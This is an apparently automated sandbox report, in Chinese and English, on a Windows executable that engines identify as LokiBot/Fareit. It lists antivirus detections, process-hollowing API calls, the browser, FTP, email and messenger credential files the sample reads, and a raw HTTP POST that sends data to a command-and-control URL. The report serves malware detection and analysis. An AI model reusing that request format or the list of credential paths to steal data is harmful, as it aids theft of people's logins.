10.6
0-day
60 个模型检测该样本为恶意!
重新分析
更多

f94788e7bfdc505f85854bc525b126c665f6cb1f16e674bbec097e44b98f949b

04f0ea5add6e521b6247717be3b6d5c5.exe

分析耗时

73s

最近分析

文件大小

725.5KB
静态报毒 动态报毒 100% AGEN AI SCORE=98 ALI2000015 ANDROM AUTO AUXG BTDFUY CLASSIC CONFIDENCE DELFINJECT DELPHILESS ELKP ELQF FAREIT GENERICKDZ GENETIC HIGH CONFIDENCE HLAQAH IGENT KRYPTIK LOKI LOKIBOT MALWARE@#V9N1E2RFXSX4 PRUO PUTTY R + MAL SCORE SIGGEN2 STATIC AI SUSGEN SUSPICIOUS PE TG0@AGZJ UNSAFE X2059 ZELPHIF 更多
鹰眼引擎
未检测 暂无鹰眼引擎检测结果
静态判定
反病毒引擎
查杀引擎 查杀结果 查杀时间 查杀版本
Alibaba Trojan:Win32/DelfInject.ali2000015 20190527 0.3.0.5
Baidu 20190318 1.0.0.2
Avast Win32:Trojan-gen 20201229 21.1.5827.0
Tencent Win32.Trojan.Inject.Auto 20201229 1.0.0.1
Kingsoft 20201229 2017.9.26.565
McAfee Fareit-FSK!04F0EA5ADD6E 20201229 6.0.6.653
CrowdStrike win/malicious_confidence_100% (W) 20190702 1.0
静态指标
Queries for the computername (1 个事件)
Time & API Arguments Status Return Repeated
1619156636.449626
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 个事件)
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
Tries to locate where the browsers are installed (1 个事件)
registry HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox
Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 个事件)
Time & API Arguments Status Return Repeated
1619156634.840626
GlobalMemoryStatusEx
success 1 0
The executable contains unknown PE section names indicative of a packer (could be a false positive) (3 个事件)
section CODE
section DATA
section BSS
The executable uses a known packer (1 个事件)
packer BobSoft Mini Delphi -> BoB / BobSoft
One or more processes crashed (1 个事件)
Time & API Arguments Status Return Repeated
1619134514.905372
__exception__
stacktrace: 
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763533ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77d69ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77d69ea5

registers.esp: 34471744
registers.edi: 0
registers.eax: 0
registers.ebp: 34471816
registers.edx: 15
registers.ebx: 0
registers.esi: 0
registers.ecx: 838
exception.instruction_r: f7 f0 33 c0 5a 59 59 64 89 10 eb 6e e9 2c e4 f8
exception.symbol: 04f0ea5add6e521b6247717be3b6d5c5+0x7520b
exception.instruction: div eax
exception.module: 04f0ea5add6e521b6247717be3b6d5c5.exe
exception.exception_code: 0xc0000094
exception.offset: 479755
exception.address: 0x47520b
success 0 0
行为判定
动态指标
One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.
HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 个事件)
suspicious_features POST method with no referer header, HTTP version 1.0 used suspicious_request POST http://mahetechasia.com/data/five/fre.php
Performs some HTTP requests (1 个事件)
request POST http://mahetechasia.com/data/five/fre.php
Sends data using the HTTP POST Method (1 个事件)
request POST http://mahetechasia.com/data/five/fre.php
Allocates read-write-execute memory (usually to unpack itself) (3 个事件)
Time & API Arguments Status Return Repeated
1619134514.749372
NtAllocateVirtualMemory
process_identifier: 784
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x00350000
success 0 0
1619134514.905372
NtAllocateVirtualMemory
process_identifier: 784
region_size: 49152
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x005d0000
success 0 0
1619134514.905372
NtAllocateVirtualMemory
process_identifier: 784
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x01f70000
success 0 0
Steals private information from local Internet browsers (19 个事件)
file C:\Users\Administrator.Oskar-PC\AppData\Local\Google\Chrome\User Data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\Opera\Opera Next\data\User Data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\Opera\Opera Next\data\User Data\Default\Web Data
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\Opera\Opera Next\data\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\Opera\Opera Next\data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\Chromium\User Data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\Chromium\User Data\Default\Web Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\MapleStudio\ChromePlus\User Data\Default\Web Data
file C:\Users\Administrator.Oskar-PC\AppData\LocalMapleStudio\ChromePlus\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\LocalMapleStudio\ChromePlus\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\MapleStudio\ChromePlus\User Data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\Nichrome\User Data\Default\Web Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\Nichrome\User Data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\RockMelt\User Data\Default\Web Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\RockMelt\User Data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\Yandex\YandexBrowser\User Data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\Yandex\YandexBrowser\User Data\Default\Web Data
registry HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\SeaMonkey
registry HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox
The binary likely contains encrypted or compressed data indicative of a packer (3 个事件)
entropy 7.627439312032049 section {'size_of_data': '0x0000da00', 'virtual_address': '0x00076000', 'entropy': 7.627439312032049, 'name': 'DATA', 'virtual_size': '0x0000d994'} description A section with a high entropy has been found
entropy 7.206445784530962 section {'size_of_data': '0x00027600', 'virtual_address': '0x00094000', 'entropy': 7.206445784530962, 'name': '.rsrc', 'virtual_size': '0x000274fc'} description A section with a high entropy has been found
entropy 0.29261559696342304 description Overall entropy of this PE file is high
网络通信
Communicates with host for which no DNS query was performed (1 个事件)
host 172.217.24.14
Harvests credentials from local FTP client softwares (22 个事件)
file C:\Program Files (x86)\FTPGetter\Profile\servers.xml
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\FTPGetter\servers.xml
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\Estsoft\ALFTP\ESTdb2.dat
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\wcx_ftp.ini
file C:\Windows\wcx_ftp.ini
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\GHISLER\wcx_ftp.ini
file C:\Users\Administrator.Oskar-PC\wcx_ftp.ini
file C:\Windows\32BitFtp.ini
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\FileZilla\sitemanager.xml
file C:\Program Files (x86)\FileZilla\Filezilla.xml
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\FileZilla\filezilla.xml
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\FileZilla\recentservers.xml
registry HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
registry HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
registry HKEY_CURRENT_USER\Software\Ghisler\Total Commander
registry HKEY_CURRENT_USER\Software\VanDyke\SecureFX
registry HKEY_CURRENT_USER\Software\LinasFTP\Site Manager
registry HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
registry HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions
registry HKEY_LOCAL_MACHINE\Software\SimonTatham\PuTTY\Sessions
registry HKEY_CURRENT_USER\Software\Martin Prikryl
registry HKEY_LOCAL_MACHINE\Software\Martin Prikryl
Harvests information related to installed instant messenger clients (1 个事件)
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\.purple\accounts.xml
Harvests credentials from local email clients (3 个事件)
registry HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
registry HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Thunderbird
registry HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook
Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 个事件)
Process injection Process 784 called NtSetContextThread to modify thread in remote process 880
Time & API Arguments Status Return Repeated
1619134515.421372
NtSetContextThread
thread_handle: 0x00000108
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4274654
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 880
success 0 0
Putty Files, Registry Keys and/or Mutexes Detected
Resumed a suspended thread in a remote process potentially indicative of process injection (2 个事件)
Process injection Process 784 resumed a thread in remote process 880
Time & API Arguments Status Return Repeated
1619134515.764372
NtResumeThread
thread_handle: 0x00000108
suspend_count: 1
process_identifier: 880
success 0 0
Executed a process and injected code into it, probably while unpacking (7 个事件)
Time & API Arguments Status Return Repeated
1619134515.249372
CreateProcessInternalW
thread_identifier: 2404
thread_handle: 0x00000108
process_identifier: 880
current_directory:
filepath:
track: 1
command_line: "C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\04f0ea5add6e521b6247717be3b6d5c5.exe"
filepath_r:
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
process_handle: 0x0000010c
inherit_handles: 0
success 1 0
1619134515.249372
NtUnmapViewOfSection
process_identifier: 880
region_size: 4096
process_handle: 0x0000010c
base_address: 0x00400000
success 0 0
1619134515.249372
NtMapViewOfSection
section_handle: 0x00000114
process_identifier: 880
commit_size: 663552
win32_protect: 64 (PAGE_EXECUTE_READWRITE)
buffer:
process_handle: 0x0000010c
allocation_type: 0 ()
section_offset: 0
view_size: 663552
base_address: 0x00400000
success 0 0
1619134515.421372
NtGetContextThread
thread_handle: 0x00000108
success 0 0
1619134515.421372
NtSetContextThread
thread_handle: 0x00000108
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4274654
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 880
success 0 0
1619134515.764372
NtResumeThread
thread_handle: 0x00000108
suspend_count: 1
process_identifier: 880
success 0 0
1619156635.340626
NtResumeThread
thread_handle: 0x00000110
suspend_count: 1
process_identifier: 880
success 0 0
File has been identified by 60 AntiVirus engines on VirusTotal as malicious (50 out of 60 个事件)
Elastic malicious (high confidence)
MicroWorld-eScan Trojan.GenericKDZ.66802
FireEye Generic.mg.04f0ea5add6e521b
ALYac Spyware.LokiBot
Cylance Unsafe
Sangfor Malware
K7AntiVirus Riskware ( 0040eff71 )
Alibaba Trojan:Win32/DelfInject.ali2000015
K7GW Riskware ( 0040eff71 )
Cybereason malicious.add6e5
Arcabit Trojan.Generic.D104F2
Cyren W32/Injector.PRUO-8504
Symantec Trojan.Gen.MBT
TrendMicro-HouseCall TrojanSpy.Win32.LOKI.CLB
Avast Win32:Trojan-gen
ClamAV Win.Dropper.LokiBot-8401618-0
Kaspersky HEUR:Trojan.Win32.Kryptik.gen
BitDefender Trojan.GenericKDZ.66802
NANO-Antivirus Trojan.Win32.Stealer.hlaqah
Paloalto generic.ml
ViRobot Trojan.Win32.Z.Injector.742912.D
Tencent Win32.Trojan.Inject.Auto
Ad-Aware Trojan.GenericKDZ.66802
Emsisoft Trojan.GenericKDZ.66802 (B)
Comodo Malware@#v9n1e2rfxsx4
F-Secure Heuristic.HEUR/AGEN.1136306
DrWeb Trojan.PWS.Siggen2.48024
VIPRE Trojan.Win32.Generic!BT
TrendMicro TrojanSpy.Win32.LOKI.CLB
McAfee-GW-Edition BehavesLike.Win32.Fareit.bh
Sophos Mal/Generic-R + Mal/Fareit-AA
SentinelOne Static AI - Suspicious PE
Jiangmin Backdoor.Androm.auxg
Webroot W32.Trojan.Gen
Avira HEUR/AGEN.1136306
Antiy-AVL Trojan/Win32.Kryptik
Gridinsoft Trojan.Win32.Kryptik.ba!s1
Microsoft Trojan:Win32/LokiBot.AG!MTB
AegisLab Trojan.Multi.Generic.4!c
ZoneAlarm HEUR:Trojan.Win32.Kryptik.gen
GData Trojan.GenericKDZ.66802
Cynet Malicious (score: 100)
AhnLab-V3 Suspicious/Win.Delphiless.X2059
Acronis suspicious
McAfee Fareit-FSK!04F0EA5ADD6E
MAX malware (ai score=98)
VBA32 Trojan.Kryptik
Malwarebytes Trojan.MalPack.DLF.Generic
APEX Malicious
ESET-NOD32 a variant of Win32/Injector.ELQF
可视化分析
二进制图像
暂无二进制图像 该样本未生成二进制可视化图像
运行截图
暂无运行截图 该样本运行过程中未生成截图

👋 欢迎使用 ChatHawk

我是您的恶意软件分析助手,可以帮您分析和解读恶意软件报告。请随时向我提问!

🔍 主要威胁分析
⚡ 行为特征
🛡️ 防护建议
🔧 技术手段
🎯 检测方法
🤖

PE Compile Time

1992-06-20 06:22:17

Imports

Library kernel32.dll:
0x485164 VirtualFree
0x485168 VirtualAlloc
0x48516c LocalFree
0x485170 LocalAlloc
0x485174 GetTickCount
0x48517c GetVersion
0x485180 GetCurrentThreadId
0x48518c VirtualQuery
0x485190 WideCharToMultiByte
0x485194 MultiByteToWideChar
0x485198 lstrlenA
0x48519c lstrcpynA
0x4851a0 LoadLibraryExA
0x4851a4 GetThreadLocale
0x4851a8 GetStartupInfoA
0x4851ac GetProcAddress
0x4851b0 GetModuleHandleA
0x4851b4 GetModuleFileNameA
0x4851b8 GetLocaleInfoA
0x4851bc GetCommandLineA
0x4851c0 FreeLibrary
0x4851c4 FindFirstFileA
0x4851c8 FindClose
0x4851cc ExitProcess
0x4851d0 ExitThread
0x4851d4 CreateThread
0x4851d8 WriteFile
0x4851e0 RtlUnwind
0x4851e4 RaiseException
0x4851e8 GetStdHandle
Library user32.dll:
0x4851f0 GetKeyboardType
0x4851f4 LoadStringA
0x4851f8 MessageBoxA
0x4851fc CharNextA
Library advapi32.dll:
0x485204 RegQueryValueExA
0x485208 RegOpenKeyExA
0x48520c RegCloseKey
Library oleaut32.dll:
0x485214 SysFreeString
0x485218 SysReAllocStringLen
0x48521c SysAllocStringLen
Library kernel32.dll:
0x485224 TlsSetValue
0x485228 TlsGetValue
0x48522c LocalAlloc
0x485230 GetModuleHandleA
Library advapi32.dll:
0x485238 RegQueryValueExA
0x48523c RegQueryInfoKeyA
0x485240 RegOpenKeyExA
0x485244 RegFlushKey
0x485248 RegEnumKeyExA
0x48524c RegCloseKey
Library kernel32.dll:
0x485254 lstrcpyA
0x485258 lstrcmpA
0x48525c WriteFile
0x485264 WaitForSingleObject
0x485268 VirtualQuery
0x48526c VirtualAlloc
0x485270 SuspendThread
0x485274 Sleep
0x485278 SizeofResource
0x48527c SetThreadPriority
0x485280 SetThreadLocale
0x485284 SetFilePointer
0x485288 SetEvent
0x48528c SetErrorMode
0x485290 SetEndOfFile
0x485294 ResumeThread
0x485298 ResetEvent
0x48529c ReadFile
0x4852a0 MulDiv
0x4852a4 LockResource
0x4852a8 LoadResource
0x4852ac LoadLibraryA
0x4852b8 GlobalUnlock
0x4852bc GlobalReAlloc
0x4852c0 GlobalHandle
0x4852c4 GlobalLock
0x4852c8 GlobalFree
0x4852cc GlobalFindAtomA
0x4852d0 GlobalDeleteAtom
0x4852d4 GlobalAlloc
0x4852d8 GlobalAddAtomA
0x4852dc GetVersionExA
0x4852e0 GetVersion
0x4852e8 GetTickCount
0x4852ec GetThreadLocale
0x4852f0 GetTempPathA
0x4852f8 GetSystemTime
0x4852fc GetSystemInfo
0x485300 GetStringTypeExA
0x485304 GetStdHandle
0x485308 GetProcAddress
0x48530c GetModuleHandleA
0x485310 GetModuleFileNameA
0x485314 GetLocaleInfoA
0x485318 GetLocalTime
0x48531c GetLastError
0x485320 GetFullPathNameA
0x485324 GetFileSize
0x485328 GetExitCodeThread
0x48532c GetDiskFreeSpaceA
0x485330 GetDateFormatA
0x485334 GetCurrentThreadId
0x485338 GetCurrentProcessId
0x48533c GetCPInfo
0x485340 GetACP
0x485344 FreeResource
0x48534c InterlockedExchange
0x485354 FreeLibrary
0x485358 FormatMessageA
0x48535c FindResourceA
0x485360 FindFirstFileA
0x485364 FindClose
0x485374 ExitThread
0x485378 EnumCalendarInfoA
0x485384 CreateThread
0x485388 CreateFileA
0x48538c CreateEventA
0x485390 CompareStringA
0x485394 CloseHandle
Library version.dll:
0x48539c VerQueryValueA
0x4853a4 GetFileVersionInfoA
Library gdi32.dll:
0x4853ac UnrealizeObject
0x4853b0 StretchBlt
0x4853b4 SetWindowOrgEx
0x4853b8 SetViewportOrgEx
0x4853bc SetTextColor
0x4853c0 SetStretchBltMode
0x4853c4 SetROP2
0x4853c8 SetPixel
0x4853cc SetDIBColorTable
0x4853d0 SetBrushOrgEx
0x4853d4 SetBkMode
0x4853d8 SetBkColor
0x4853dc SelectPalette
0x4853e0 SelectObject
0x4853e4 SaveDC
0x4853e8 RestoreDC
0x4853ec Rectangle
0x4853f0 RectVisible
0x4853f4 RealizePalette
0x4853f8 PatBlt
0x4853fc MoveToEx
0x485400 MaskBlt
0x485404 LineTo
0x485408 IntersectClipRect
0x48540c GetWindowOrgEx
0x485410 GetTextMetricsA
0x48541c GetStockObject
0x485420 GetPixel
0x485424 GetPaletteEntries
0x485428 GetObjectA
0x48542c GetDeviceCaps
0x485430 GetDIBits
0x485434 GetDIBColorTable
0x485438 GetDCOrgEx
0x485440 GetClipBox
0x485444 GetBrushOrgEx
0x485448 GetBitmapBits
0x48544c ExtTextOutA
0x485450 ExcludeClipRect
0x485454 DeleteObject
0x485458 DeleteDC
0x48545c CreateSolidBrush
0x485460 CreatePenIndirect
0x485464 CreatePalette
0x48546c CreateFontIndirectA
0x485470 CreateDIBitmap
0x485474 CreateDIBSection
0x485478 CreateCompatibleDC
0x485480 CreateBrushIndirect
0x485484 CreateBitmap
0x485488 BitBlt
Library user32.dll:
0x485490 CreateWindowExA
0x485494 WindowFromPoint
0x485498 WinHelpA
0x48549c WaitMessage
0x4854a0 UpdateWindow
0x4854a4 UnregisterClassA
0x4854a8 UnhookWindowsHookEx
0x4854ac TranslateMessage
0x4854b4 TrackPopupMenu
0x4854bc ShowWindow
0x4854c0 ShowScrollBar
0x4854c4 ShowOwnedPopups
0x4854c8 ShowCursor
0x4854cc SetWindowsHookExA
0x4854d0 SetWindowTextA
0x4854d4 SetWindowPos
0x4854d8 SetWindowPlacement
0x4854dc SetWindowLongA
0x4854e0 SetTimer
0x4854e4 SetScrollRange
0x4854e8 SetScrollPos
0x4854ec SetScrollInfo
0x4854f0 SetRect
0x4854f4 SetPropA
0x4854f8 SetParent
0x4854fc SetMenuItemInfoA
0x485500 SetMenu
0x485504 SetForegroundWindow
0x485508 SetFocus
0x48550c SetCursor
0x485510 SetClassLongA
0x485514 SetCapture
0x485518 SetActiveWindow
0x48551c SendMessageA
0x485520 ScrollWindow
0x485524 ScreenToClient
0x485528 RemovePropA
0x48552c RemoveMenu
0x485530 ReleaseDC
0x485534 ReleaseCapture
0x485540 RegisterClassA
0x485544 RedrawWindow
0x485548 PtInRect
0x48554c PostQuitMessage
0x485550 PostMessageA
0x485554 PeekMessageA
0x485558 OffsetRect
0x48555c OemToCharA
0x485564 MessageBoxA
0x485568 MapWindowPoints
0x48556c MapVirtualKeyA
0x485570 LoadStringA
0x485574 LoadKeyboardLayoutA
0x485578 LoadIconA
0x48557c LoadCursorA
0x485580 LoadBitmapA
0x485584 KillTimer
0x485588 IsZoomed
0x48558c IsWindowVisible
0x485590 IsWindowEnabled
0x485594 IsWindow
0x485598 IsRectEmpty
0x48559c IsIconic
0x4855a0 IsDialogMessageA
0x4855a4 IsChild
0x4855a8 InvalidateRect
0x4855ac IntersectRect
0x4855b0 InsertMenuItemA
0x4855b4 InsertMenuA
0x4855b8 InflateRect
0x4855c0 GetWindowTextA
0x4855c4 GetWindowRect
0x4855c8 GetWindowPlacement
0x4855cc GetWindowLongA
0x4855d0 GetWindowDC
0x4855d4 GetTopWindow
0x4855d8 GetSystemMetrics
0x4855dc GetSystemMenu
0x4855e0 GetSysColorBrush
0x4855e4 GetSysColor
0x4855e8 GetSubMenu
0x4855ec GetScrollRange
0x4855f0 GetScrollPos
0x4855f4 GetScrollInfo
0x4855f8 GetPropA
0x4855fc GetParent
0x485600 GetWindow
0x485604 GetMenuStringA
0x485608 GetMenuState
0x48560c GetMenuItemInfoA
0x485610 GetMenuItemID
0x485614 GetMenuItemCount
0x485618 GetMenu
0x48561c GetLastActivePopup
0x485620 GetKeyboardState
0x485628 GetKeyboardLayout
0x48562c GetKeyState
0x485630 GetKeyNameTextA
0x485634 GetIconInfo
0x485638 GetForegroundWindow
0x48563c GetFocus
0x485640 GetDesktopWindow
0x485644 GetDCEx
0x485648 GetDC
0x48564c GetCursorPos
0x485650 GetCursor
0x485654 GetClientRect
0x485658 GetClassNameA
0x48565c GetClassInfoA
0x485660 GetCapture
0x485664 GetActiveWindow
0x485668 FrameRect
0x48566c FindWindowA
0x485670 FillRect
0x485674 EqualRect
0x485678 EnumWindows
0x48567c EnumThreadWindows
0x485680 EndPaint
0x485684 EnableWindow
0x485688 EnableScrollBar
0x48568c EnableMenuItem
0x485690 DrawTextA
0x485694 DrawMenuBar
0x485698 DrawIconEx
0x48569c DrawIcon
0x4856a0 DrawFrameControl
0x4856a4 DrawFocusRect
0x4856a8 DrawEdge
0x4856ac DispatchMessageA
0x4856b0 DestroyWindow
0x4856b4 DestroyMenu
0x4856b8 DestroyIcon
0x4856bc DestroyCursor
0x4856c0 DeleteMenu
0x4856c4 DefWindowProcA
0x4856c8 DefMDIChildProcA
0x4856cc DefFrameProcA
0x4856d0 CreatePopupMenu
0x4856d4 CreateMenu
0x4856d8 CreateIcon
0x4856dc ClientToScreen
0x4856e0 CheckMenuItem
0x4856e4 CallWindowProcA
0x4856e8 CallNextHookEx
0x4856ec BeginPaint
0x4856f0 CharNextA
0x4856f4 CharLowerBuffA
0x4856f8 CharLowerA
0x4856fc CharUpperBuffA
0x485700 CharToOemA
0x485704 AdjustWindowRectEx
Library kernel32.dll:
0x485710 Sleep
Library oleaut32.dll:
0x485718 SafeArrayPtrOfIndex
0x48571c SafeArrayGetUBound
0x485720 SafeArrayGetLBound
0x485724 SafeArrayCreate
0x485728 VariantChangeType
0x48572c VariantCopy
0x485730 VariantClear
0x485734 VariantInit
Library ole32.dll:
0x48573c CoTaskMemAlloc
0x485740 CoCreateInstance
0x485744 CoUninitialize
0x485748 CoInitialize
Library comctl32.dll:
0x485758 ImageList_Write
0x48575c ImageList_Read
0x48576c ImageList_DragMove
0x485770 ImageList_DragLeave
0x485774 ImageList_DragEnter
0x485778 ImageList_EndDrag
0x48577c ImageList_BeginDrag
0x485780 ImageList_Remove
0x485784 ImageList_DrawEx
0x485788 ImageList_Draw
0x485798 ImageList_Add
0x4857a0 ImageList_Destroy
0x4857a4 ImageList_Create
0x4857a8 InitCommonControls
Library comdlg32.dll:
0x4857b0 ChooseColorA
Library winmm.dll:
0x4857b8 mciSendCommandA
0x4857bc mciGetErrorStringA

Hosts

No hosts contacted.

TCP

Source Source Port Destination Destination Port
192.168.56.101 49178 50.17.5.224 mahetechasia.com 80

UDP

Source Source Port Destination Destination Port
192.168.56.101 50534 114.114.114.114 53
192.168.56.101 51808 114.114.114.114 53
192.168.56.101 51963 114.114.114.114 53
192.168.56.101 56539 114.114.114.114 53
192.168.56.101 58367 114.114.114.114 53
192.168.56.101 65004 114.114.114.114 53
192.168.56.101 137 192.168.56.255 137
192.168.56.101 138 192.168.56.255 138
192.168.56.101 123 20.189.79.72 time.windows.com 123
192.168.56.101 49235 224.0.0.252 5355
192.168.56.101 56804 224.0.0.252 5355
192.168.56.101 60123 224.0.0.252 5355
192.168.56.101 62191 224.0.0.252 5355
192.168.56.101 1900 239.255.255.250 1900
192.168.56.101 56540 239.255.255.250 3702
192.168.56.101 56807 239.255.255.250 1900
192.168.56.101 58368 239.255.255.250 3702
192.168.56.101 58370 239.255.255.250 3702
192.168.56.101 58707 239.255.255.250 3702

HTTP & HTTPS Requests

URI Data
http://mahetechasia.com/data/five/fre.php 
POST /data/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: mahetechasia.com
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 902AECAC
Content-Length: 196
Connection: close

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.